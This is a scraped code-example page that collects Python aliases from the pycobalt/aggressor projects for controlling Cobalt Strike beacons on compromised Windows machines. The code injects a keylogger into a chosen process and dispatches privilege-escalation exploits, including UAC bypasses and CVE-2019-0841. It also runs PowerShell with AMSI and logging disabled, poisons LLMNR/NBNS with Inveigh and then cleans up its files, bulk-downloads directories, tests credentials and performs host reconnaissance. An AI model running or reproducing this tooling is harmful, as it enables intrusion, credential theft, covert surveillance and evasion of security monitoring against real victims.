コード例 #1
def _(bid, code, *args):
    """Build *code* with SharpGen and execute the result on beacon *bid*.

    *args* are passed straight through to ``sharpgen.execute``. A
    ``RuntimeError`` raised by SharpGen is reported on the beacon console
    and swallowed; the underlying cause is left to the script console.
    """
    task_line = 'Tasked beacon to execute C# code: {code}'.format(code=code)
    aggressor.btask(bid, task_line)

    try:
        sharpgen.execute(bid, code, *args)
    except RuntimeError:
        # build details are not repeated here; they stay on the script console
        aggressor.berror(
            bid, 'SharpGen failed. See script console for more details')
コード例 #2
ファイル: autoinject.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *proc_names):
    """Start the beacon keylogger in the first matching process.

    *proc_names* are tried in order; with none given, the module-level
    ``default_procs`` list is used. The beacon's process list is requested
    with ``aggressor.bps`` and parsed by ``helpers.parse_ps``; a process is
    only chosen if its entry has both an ``arch`` and a ``user`` field.
    If nothing matches, an error is written to the beacon console.
    """
    names = proc_names or default_procs

    def pick_target(procs):
        # outer loop is the caller's preference order, so the first *name*
        # that has a usable process wins even if a later name appears
        # earlier in the process list
        for wanted in names:
            for proc in procs:
                if proc['name'] != wanted:
                    continue
                if 'arch' in proc and 'user' in proc:
                    return proc
        return None

    def on_ps_output(_cb_bid, content):
        target = pick_target(helpers.parse_ps(content))
        if target is None:
            aggressor.berror(bid, "Didn't find any processes to inject keylogger")
            return

        aggressor.blog(
            bid, 'Keylogging process {} ({} {})'.format(
                target['name'], target['pid'], target['arch']))
        aggressor.bkeylogger(bid, target['pid'], target['arch'], silent=True)

    aggressor.btask(
        bid, 'Tasked beacon to keylog first accessible process named: ' +
        ', '.join(names))
    aggressor.bps(bid, on_ps_output)
コード例 #3
ファイル: external.py プロジェクト: 5l1v3r1/aggressor-1
def run(bid, program, args=None, silent=False):
    """Run a registered tool on beacon *bid* through whichever table it lives in.

    *program* is looked up, in order, in the module-level ``assemblies``,
    ``powershell`` and ``callbacks`` tables (none of them visible in this
    snippet). *args* defaults to an empty list; for an assembly it is
    quoted with ``helpers.eaq``, for a PowerShell script it is joined into
    one command line, for a callback it is handed over untouched.

    Args:
        bid: beacon id.
        program: key into one of the three tables.
        args: tool arguments; ``None``/empty means no arguments.
        silent: suppress the "Tasked beacon" line (assembly branch) or is
            forwarded to the callback; the PowerShell branch ignores it.

    Raises:
        RuntimeError: if *program* is in none of the three tables.
    """
    # no args
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        args = helpers.eaq(args)

        if not silent:
            aggressor.btask(bid,
                            'Tasked beacon to run {} {}'.format(program, args))
        # always silent here: the optional task line above is the only output
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)

        # NOTE(review): elsewhere in this module powershell_quote is called on
        # a single string; what it returns for a list/tuple is not visible here
        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))

        # NOTE(review): by now args is normally a str (either the caller's
        # string or the join above), and ' '.join() on a str puts a space
        # between every character -- presumably `args` alone was intended.
        # This branch also never honours `silent`.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
コード例 #4
ファイル: powerpick.py プロジェクト: 5l1v3r1/aggressor-1
def custom_powerpick(bid, command, silent=False, auto_host=True):
    """Run PowerShell *command* on beacon *bid* through a SharpGen-built host.

    The embedded C# joins its command-line arguments with newlines and hands
    the text to ``Execution.PowerShell.RunAsync``, so the Python side ships
    *command* to ``sharpgen.execute`` one line per argument. Before that,
    the beacon's imported-script cradle (if any) is prepended so functions
    from ``powershell-import`` are available, and when *auto_host* is set a
    command longer than the module-level ``max_script_size`` is replaced by
    a hosted one via ``aggressor.beacon_host_script``.

    Args:
        bid: beacon id.
        command: PowerShell text to run; may span several lines.
        silent: suppress the "Tasked beacon" line on the console.
        auto_host: allow swapping an over-long command for a hosted script.
    """
    # public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
    # NOTE(review): the RunAsync flags below turn off PowerShell logging and
    # AMSI for the spawned runspace; from a detection standpoint that is the
    # notable property of this helper.
    code = helpers.code_string(r"""
    string powershell = String.Join("\n", args);
    var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
    foreach (string result in results) {
        Console.Write(result);
    }
    """)

    if not silent:
        # newlines flattened so the task line stays on one line
        aggressor.btask(
            bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(
                command.replace('\n', ' ')))

    # include cradle for `powershell-import`/`bpowershell_import`
    cradle = aggressor.beacon_host_imported_script(bid)
    if cradle:
        command = cradle + '\n' + command

    # if the script is too long, host it
    if auto_host and len(command) > max_script_size:
        command = aggressor.beacon_host_script(bid, command)

    # NOTE(review): echoes the full command to the script console on every
    # call -- looks like a debugging leftover; confirm before removing
    engine.message(command)
    references = [
        'mscorlib.dll', 'System.dll', 'System.Core.dll',
        'System.Management.Automation.dll'
    ]
    # leading '' presumably so the C#-side join starts the script on a fresh
    # line (args[0] is empty) -- TODO confirm against sharpgen.execute
    sharpgen.execute(bid,
                     code, [''] + command.split('\n'),
                     references=references,
                     resources=[],
                     cache=sharpgen_cache)
コード例 #5
ファイル: privesc.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, exploit, *args):
    """Dispatch an elevation routine by name on beacon *bid*.

    *exploit* must be a key of the local ``callbacks`` table; the matching
    function is called with ``bid`` followed by *args*. The argument count
    is validated with ``pycobalt.utils.check_args`` first so a bad
    invocation is reported on the console instead of raising.
    """
    callbacks = {
        'token-shellcode': elevate_token_shellcode,
        'token-command': elevate_token_command,
        'slui-shellcode': elevate_slui_shellcode,
        'slui-command': elevate_slui_command,
        'fodhelper-shellcode': elevate_fodhelper_shellcode,
        'fodhelper-command': elevate_fodhelper_command,
        'eventvwr-command': elevate_eventvwr_command,
        'wscript-shellcode': elevate_wscript_shellcode,
        'wscript-command': elevate_wscript_command,
        'runas-shellcode': elevate_runas_shellcode,
        'cve-2019-0841': elevate_cve_2019_0841,
    }

    handler = callbacks.get(exploit)
    if handler is None:
        aggressor.berror(
            bid,
            'Exploit must be one of: {}'.format(', '.join(callbacks.keys())))
        return

    aggressor.btask(
        bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit))

    # trim=1 drops the leading `bid` parameter from the printed signature
    if not pycobalt.utils.check_args(handler, (bid, ) + args):
        signature = pycobalt.utils.signature(handler, trim=1)
        aggressor.berror(
            bid, 'Invalid arguments to exploit {}. Signature: {}'.format(
                exploit, signature))
        return

    handler(bid, *args)
コード例 #6
ファイル: recon.py プロジェクト: superuser5/pycobalt
def _(bid):
    """Report the OS caption and installed hotfixes (``wmic qfe``) from beacon *bid*."""
    aggressor.btask(bid, 'Tasked beacon to get patch status')

    script = textwrap.dedent("""
        wmic os get Caption /value | more
        wmic qfe
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #7
ファイル: recon.py プロジェクト: superuser5/pycobalt
def _(bid):
    """List the contents of four common folders under the user's profile."""
    folders = ['Desktop', 'Documents', 'Downloads', 'Favorites']
    # one `ls` per folder, newline-terminated
    script = ''.join(
        'ls $env:userprofile\\{}\n'.format(folder) for folder in folders)

    aggressor.btask(bid, 'Tasked beacon to show common document folders')
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #8
ファイル: recon.py プロジェクト: superuser5/pycobalt
def _(bid):
    """List the user's local and roaming AppData directories."""
    aggressor.btask(bid, 'Tasked beacon to show AppData')

    script = textwrap.dedent("""
        ls $env:localappdata
        ls $env:appdata
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #9
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid):
    """Table the id, name and window title of every process that owns a main window."""
    aggressor.btask(bid, 'Tasked beacon to list open windows')

    script = helpers.code_string(r"""
    Get-Process |
        Where { $_.mainWindowTitle } |
        Format-Table id,name,mainwindowtitle -AutoSize
    """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #10
ファイル: lateral.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *hosts):
    """Run TestAntivirus.exe via ``bexecute_assembly``, locally or against *hosts*.

    The assembly path is fixed; *hosts* are quoted with ``helpers.eaq`` and
    passed as its arguments (an empty tuple means a local check).
    """
    exe = '/share/tools/post_exploitation/TestAntivirus/bin/Release/net35/TestAntivirus.exe'

    if hosts:
        note = 'Tasked beacon to check AV on: ' + ', '.join(hosts)
    else:
        note = 'Tasked beacon to check local AV'
    aggressor.btask(bid, note)

    aggressor.bexecute_assembly(bid, exe, helpers.eaq(hosts), silent=True)
コード例 #11
ファイル: exfil.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *directories):
    """Walk each of *directories* on beacon *bid* and queue a download per path.

    ``helpers.recurse_ls`` does the walk and invokes ``queue_download``
    (presumably once per file found). With no directories nothing happens.
    """
    def queue_download(path):
        aggressor.bdownload(bid, path)

    for directory in directories:
        note = 'Tasked beacon to recurse {} for files to download'.format(
            directory)
        aggressor.btask(bid, note)
        helpers.recurse_ls(bid, directory, queue_download)
コード例 #12
ファイル: recon.py プロジェクト: superuser5/pycobalt
def _(bid):
    """Table every environment variable of the beacon process, sorted by name."""
    aggressor.btask(bid, 'Tasked beacon to get environmental variables')

    script = textwrap.dedent(r"""
        Get-Childitem -path env:* |
            Select-Object Name, Value |
            Sort-Object name |
            Format-Table -Auto
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #13
ファイル: recon.py プロジェクト: superuser5/pycobalt
def _(bid):
    """List uninstall entries (name and install date) from the Wow6432Node registry hive."""
    aggressor.btask(bid, 'Tasked beacon to get list of uninstallers')

    script = textwrap.dedent(r"""
        Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |
        Select-Object DisplayName, InstallDate |
        Sort-Object -Property DisplayName |
        Format-Table -AutoSize
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #14
def _(bid, code, *args):
    """Build *code* with SharpGen using the module-level ``cache`` and run it on *bid*.

    *args* is handed to ``sharpgen.execute`` as one tuple. Its return value
    is treated as a cache-hit flag and reported with ``blog2``. A
    ``RuntimeError`` from SharpGen is reported on the beacon console and
    swallowed.
    """
    note = 'Tasked beacon to execute C# code: {}'.format(code)
    aggressor.btask(bid, note)

    try:
        cache_hit = sharpgen.execute(bid, code, args, cache=cache)
        if cache_hit:
            aggressor.blog2(bid, 'Build was retrieved from the cache')
    except RuntimeError:
        # details stay on the script console
        aggressor.berror(
            bid, 'SharpGen failed. See Script Console for more details.')
コード例 #15
def _(bid, runtime=99999, *args):
    """Import Inveigh into beacon *bid* and start it with file output enabled.

    *runtime* is the first extra positional argument (default 99999) and
    becomes ``-RunTime``; any further positional arguments are appended to
    the Invoke-Inveigh line verbatim. Output files are written under the
    user's roaming ``Microsoft`` directory, as the task line says.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
    aggressor.btask(
        bid,
        'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft'
    )

    invocation = r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory $env:userprofile\AppData\Roaming\Microsoft -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
    extra = ' '.join(args)
    aggressor.bpowerpick(bid, invocation.format(runtime, extra))
コード例 #16
def _(bid):
    """Report the OS caption and the installed hotfixes, newest first."""
    aggressor.btask(bid, 'Tasked beacon to get patch info')

    script = helpers.code_string(r"""
        wmic os get Caption /value
        Get-WmiObject -class Win32_quickfixengineering |
            Select-Object HotFixID,Description,InstalledBy,InstalledOn |
            Sort-Object InstalledOn -Descending |
            Format-Table -Auto
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #17
def _(bid, home=None):
    """Delete Inveigh's output files from ``<home>\\AppData\\Roaming\\Microsoft``.

    When *home* is not given, ``helpers.guess_home`` is asked for the
    profile directory. The files ``clear``, ``log``, ``v1``, ``v2`` and
    ``form`` are removed, each with its own ``brm`` task.
    """
    profile = home or helpers.guess_home(bid)
    directory = r'{}\AppData\Roaming\Microsoft'.format(profile)

    aggressor.btask(
        bid, 'Tasked beacon to remove inveigh files in {}'.format(directory))

    targets = [r'{}\{}'.format(directory, name)
               for name in ('clear', 'log', 'v1', 'v2', 'form')]
    for path in targets:
        aggressor.brm(bid, path)
コード例 #18
def _(bid):
    """Print whether the beacon's user is in the local Administrators role."""
    aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')

    script = helpers.code_string(r"""
        if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
            echo "User is a local admin!";
        } else {
            echo "User is not local admin :(";
        }
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #19
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
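def _(bid, fname, lines=10):
    """Print the first *lines* lines of *fname* on beacon *bid* via a SharpGen build.

    The C# reads ``args[0]`` as the path and ``Int32.Parse``s ``args[1]``
    as the line count, so *lines* may be an int or a digit string.

    Args:
        bid: beacon id.
        fname: path of the file on the beacon host.
        lines: number of lines to show (default 10).
    """
    code = helpers.code_string(r"""
    string file = args[0];
    int lines = Int32.Parse(args[1]);
    string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines));
    System.Console.WriteLine(text);
    """)

    # `bid` was missing from this call, so the message was being passed as
    # the beacon id; every other btask call in this module passes bid first
    aggressor.btask(bid, 'Tasked beacon to get first {} lines of {}'.format(
        lines, fname))
    sharpgen.execute(bid, code, (fname, lines))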
コード例 #20
def _(bid):
    """Print whether the beacon host is domain-joined (and which domain the user is in)."""
    aggressor.btask(bid, "Tasked beacon to check if it's in a domain")

    script = helpers.code_string(r"""
        If ((gwmi win32_computersystem).partofdomain){
            Write-Output "User is in domain: $env:userdomain"
        } Else {
            Write-Output "User is not in a domain"
        }
        """)
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #21
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *dirs):
    """List ``<dir>\\*\\*`` (two levels down) for each of *dirs*; default is ``.``."""
    targets = dirs or ['.']

    # each entry is quoted for PowerShell before being joined into one `ls`
    globbed = (powershell_quote('{}\*\*'.format(d)) for d in targets)
    script = 'ls ' + ', '.join(globbed)

    aggressor.btask(bid,
                    'Tasked beacon to list */* in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #22
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
    def callback(procs):
        """Kill every process in *procs*, logging one task line per process.

        *procs* are the parsed ``ps`` entries matching the enclosing
        ``proc_name``; an empty result is reported as an error instead.
        """
        if not procs:
            aggressor.berror(bid, 'No processes named {}'.format(proc_name))
            return

        for proc in procs:
            pieces = ['Killing {}: {}'.format(proc_name, proc['pid'])]
            # arch and user are optional columns of the parsed ps output
            for key in ('arch', 'user'):
                if key in proc:
                    pieces.append(' ({})'.format(proc[key]))

            aggressor.btask(bid, ''.join(pieces))
            aggressor.bkill(bid, proc['pid'], silent=True)
コード例 #23
def _(bid, last=50):
    """Show the last *last* entries of the user's PSReadline console history."""
    aggressor.btask(bid, 'Tasked beacon to show {} items of powershell history'.format(last))

    # braces are doubled in the template because .format() is applied to it
    template = helpers.code_string(r"""
        $hist = (Get-Content "$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -EA 0 |
            Select -last {})
        if ($hist) {{
             $hist -Join "`r`n"
        }} else {{
            "No Powershell history found"
        }}
        """)
    aggressor.bpowerpick(bid, template.format(last), silent=True)
コード例 #24
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *dirs):
    """Recursively delete each of *dirs*; refuses to run when none are given."""
    if not dirs:
        aggressor.berror(bid, 'rmr: specify some directories to kill')
        return

    # one Remove-Item per directory, each quoted for PowerShell
    script = ''.join(
        'Remove-Item -Recurse -Force {}\n'.format(powershell_quote(d))
        for d in dirs)

    aggressor.btask(
        bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #25
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *dirs):
    """Recursively list files under each of *dirs*; default is ``.``."""
    targets = dirs or ['.']

    script = ''.join(
        'Get-ChildItem -Recurse {}\n'.format(powershell_quote(d))
        for d in targets)

    aggressor.btask(
        bid, 'Tasked beacon to recursively list files in: {}'.format(
            ', '.join(targets)))
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #26
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
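def _(bid, *hosts):
    """Resolve each of *hosts* with ``nslookup`` from beacon *bid*.

    Refuses to run with no hosts; otherwise one ``nslookup`` per host is
    issued in a single PowerShell script.
    """
    if not hosts:
        # `bid` was missing here, so the message was passed as the beacon id
        # and never reached the console
        aggressor.berror(bid, 'specify a host')
        return

    command = ''.join(
        'nslookup {}\n'.format(powershell_quote(host)) for host in hosts)

    aggressor.btask(
        bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
    aggressor.bpowerpick(bid, command, silent=True)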
コード例 #27
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *users):
    """List the top level of user profile directories on beacon *bid*.

    With *users* given, each ``C:\\Users\\<user>`` is listed with ``bls``;
    without, one PowerShell line lists every profile under ``C:\\Users``.
    """
    if not users:
        aggressor.btask(bid,
                        'Tasked beacon to list files in each user profile')
        aggressor.bpowerpick(bid,
                             r'ls C:\Users | ForEach-Object { ls $_; }',
                             silent=True)
        return

    aggressor.btask(
        bid, 'Tasked beacon to list files in user profiles for: {}'.format(
            ', '.join(users)))
    for user in users:
        aggressor.bls(bid, r'C:\Users\{}'.format(user), silent=True)
コード例 #28
def _(bid, username, password):
    """Test *username*/*password* with a ``directoryservices.directoryentry`` bind.

    The script reports the credentials as valid when the bind returns a
    name (presumably against the default naming context -- confirm).

    NOTE(review): both values are interpolated into the PowerShell source
    with plain ``str.format`` and no quoting, inside a double-quoted
    PowerShell string. A password containing ``"``, ``$`` or a backtick
    will break the script or be expanded by PowerShell. The password is
    also written in clear text three times -- the two ``Write-Host`` lines
    and the task line below -- so it ends up in the beacon log; consider
    keeping the secret out of the logged messages.
    """
    command = helpers.code_string(r"""
        if ((new-object directoryservices.directoryentry "", "{username}", "{password}").psbase.name -ne $null) {{
            Write-Host "Credentials {username}:{password} are valid :)"
        }} else {{
            Write-Host "Credentials {username}:{password} are not valid :("
        }}
        """.format(username=username, password=password))

    # secret in the task line (see NOTE above)
    aggressor.btask(
        bid,
        'Tasked beacon to test credentials {}:{}'.format(username, password))
    aggressor.bpowerpick(bid, command, silent=True)
コード例 #29
ファイル: aliases.py プロジェクト: 5l1v3r1/aggressor-1
def _(bid, *dirs):
    """Query reparse-point data for every child of each of *dirs*; default is ``.``.

    One ``Get-ChildItem ... | % {{ fsutil reparsepoint query $_ }}`` line is
    emitted per directory (the task line calls these "links").
    """
    targets = dirs or ['.']

    script = ''.join(
        'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'.format(
            powershell_quote(d))
        for d in targets)

    aggressor.btask(
        bid, 'Tasked beacon to list links in: {}'.format(', '.join(targets)))
    aggressor.bpowerpick(bid, script, silent=True)
コード例 #30
ファイル: exfil.py プロジェクト: 5l1v3r1/aggressor-1
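def _(bid, *args):
    """Run the previously uploaded 7-Zip binary with *args* on beacon *bid*.

    ``_uploaded`` is a module-level path, presumably set by the ``7z-init``
    alias the error message refers to; without it the alias refuses to run.
    The arguments are joined with spaces and bracketed by two ``echo``
    markers so the tool's output is delimited in the console.
    """
    global _uploaded

    if not _uploaded:
        # `bid` was missing here, so the message was passed as the beacon id
        # and never reached the console
        aggressor.berror(bid, 'Run 7z-init first')
        return

    line = ' '.join(args)
    aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line))
    aggressor.bpowerpick(
        bid,
        "echo '7zip starting'; {} {} ; echo '7zip finished';".format(
            _uploaded, line),
        silent=True)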